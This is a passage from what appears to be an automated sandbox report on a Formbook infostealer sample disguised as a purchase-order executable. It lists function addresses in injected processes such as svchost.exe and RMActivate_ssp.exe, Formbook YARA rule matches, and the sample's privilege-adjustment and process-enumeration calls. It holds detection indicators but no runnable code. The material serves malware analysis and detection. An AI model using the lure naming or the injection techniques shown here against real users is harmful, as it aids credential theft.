            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BEFA01_2_030BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032FC81_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEE261_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040E591_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052E901_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FCE931_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEEDB1_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304AD001_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DCD1F1_2_030DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03058DBF1_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303ADE01_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040C001_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0CB51_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030CF21_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F132D1_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D34C1_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308739A1_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A01_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C01_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D2F01_2_0305D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307516C1_2_0307516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F1721_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310B16B1_2_0310B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304B1B01_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF0CC1_2_030EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C01_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F70E91_2_030F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF0E01_2_030FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF7B01_2_030FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030856301_2_03085630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F16CC1_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F75711_2_030F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DD5B01_2_030DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031095C31_2_031095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF43F1_2_030FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030314601_2_03031460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFB761_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FB801_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B5BF01_2_030B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307DBF91_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFA491_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7A461_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B3A6C1_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DDAAC1_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03085AA01_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E1AA31_2_030E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EDAC61_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D59101_2_030D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030499501_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B9501_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD8001_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030438E01_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFF091_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041F921_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFFB11_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03003FD21_2_03003FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03003FD51_2_03003FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03049EB01_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03043D401_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F1D5A1_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7D731_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FDC01_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B9C321_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFCF21_2_030FFCF2
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_0389F3CE2_2_0389F3CE
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_0387E9DE2_2_0387E9DE
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_0388095E2_2_0388095E
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_038870492_2_03887049
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_0388704E2_2_0388704E
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_0388073E2_2_0388073E
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_038807352_2_03880735
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeCode function: 2_2_03888E7E2_2_03888E7E
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FC02C03_2_02FC02C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FE02743_2_02FE0274
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_030003E63_2_030003E6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F4E3F03_2_02F4E3F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFA3523_2_02FFA352
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_030001AA3_2_030001AA
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FD20003_2_02FD2000
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF81CC3_2_02FF81CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF41A23_2_02FF41A2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FC81583_2_02FC8158
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FDA1183_2_02FDA118
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F301003_2_02F30100
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F5C6E03_2_02F5C6E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F3C7C03_2_02F3C7C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F407703_2_02F40770
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F647503_2_02F64750
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FEE4F63_2_02FEE4F6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_030005913_2_03000591
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF24463_2_02FF2446
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FE44203_2_02FE4420
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F405353_2_02F40535
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F3EA803_2_02F3EA80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF6BD73_2_02FF6BD7
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFAB403_2_02FFAB40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F6E8F03_2_02F6E8F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F268B83_2_02F268B8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0300A9A63_2_0300A9A6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F4A8403_2_02F4A840
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F428403_2_02F42840
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F429A03_2_02F429A0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F569623_2_02F56962
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFEEDB3_2_02FFEEDB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F52E903_2_02F52E90
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFCE933_2_02FFCE93
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F40E593_2_02F40E59
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFEE263_2_02FFEE26
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F32FC83_2_02F32FC8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FBEFA03_2_02FBEFA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FB4F403_2_02FB4F40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F60F303_2_02F60F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FE2F303_2_02FE2F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F82F283_2_02F82F28
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F30CF23_2_02F30CF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FE0CB53_2_02FE0CB5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F40C003_2_02F40C00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F3ADE03_2_02F3ADE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F58DBF3_2_02F58DBF
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FDCD1F3_2_02FDCD1F
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F4AD003_2_02F4AD00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F5D2F03_2_02F5D2F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FE12ED3_2_02FE12ED
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F5B2C03_2_02F5B2C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F452A03_2_02F452A0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F8739A3_2_02F8739A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F2D34C3_2_02F2D34C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF132D3_2_02FF132D
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF70E93_2_02FF70E9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFF0E03_2_02FFF0E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FEF0CC3_2_02FEF0CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F470C03_2_02F470C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0300B16B3_2_0300B16B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F4B1B03_2_02F4B1B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F2F1723_2_02F2F172
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F7516C3_2_02F7516C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF16CC3_2_02FF16CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F856303_2_02F85630
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFF7B03_2_02FFF7B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F314603_2_02F31460
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFF43F3_2_02FFF43F
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_030095C33_2_030095C3
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FDD5B03_2_02FDD5B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF75713_2_02FF7571
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FEDAC63_2_02FEDAC6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FDDAAC3_2_02FDDAAC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F85AA03_2_02F85AA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FE1AA33_2_02FE1AA3
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FB3A6C3_2_02FB3A6C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFFA493_2_02FFFA49
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF7A463_2_02FF7A46
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FB5BF03_2_02FB5BF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F7DBF93_2_02F7DBF9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F5FB803_2_02F5FB80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFFB763_2_02FFFB76
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F438E03_2_02F438E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FAD8003_2_02FAD800
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F499503_2_02F49950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F5B9503_2_02F5B950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FD59103_2_02FD5910
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F49EB03_2_02F49EB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F03FD23_2_02F03FD2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F03FD53_2_02F03FD5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFFFB13_2_02FFFFB1
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F41F923_2_02F41F92
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFFF093_2_02FFFF09
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFFCF23_2_02FFFCF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FB9C323_2_02FB9C32
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F5FDC03_2_02F5FDC0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF7D733_2_02FF7D73
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF1D5A3_2_02FF1D5A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F43D403_2_02F43D40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025A1AB03_2_025A1AB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0259CA303_2_0259CA30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0259CA273_2_0259CA27
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0259CC503_2_0259CC50
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0259ACD03_2_0259ACD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025A33403_2_025A3340
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025A333B3_2_025A333B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025A51703_2_025A5170
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025BB6C03_2_025BB6C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02D9E2D53_2_02D9E2D5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02D9E3FB3_2_02D9E3FB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02D9D7F83_2_02D9D7F8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02D9E78C3_2_02D9E78C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 107 times
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: String function: 002D7750 appears 42 times
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: String function: 002CF885 appears 68 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02FBF290 appears 103 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02F87E54 appears 107 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02F2B970 appears 262 times
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1696544060.0000000004B4D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 09110124 EXPRESS SYSTEM-SESB24066.exe
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1698346839.00000000049F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 09110124 EXPRESS SYSTEM-SESB24066.exe
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@16/10
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002FD712 GetLastError,FormatMessageW,0_2_002FD712
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002EB8B0 AdjustTokenPrivileges,CloseHandle,0_2_002EB8B0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002EBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_002EBEC3
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002FEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_002FEA85
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002F6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_002F6F5B
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_0030C604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0030C604
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002B31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_002B31F2
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeFile created: C:\Users\user\AppData\Local\Temp\aut869C.tmpJump to behavior
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
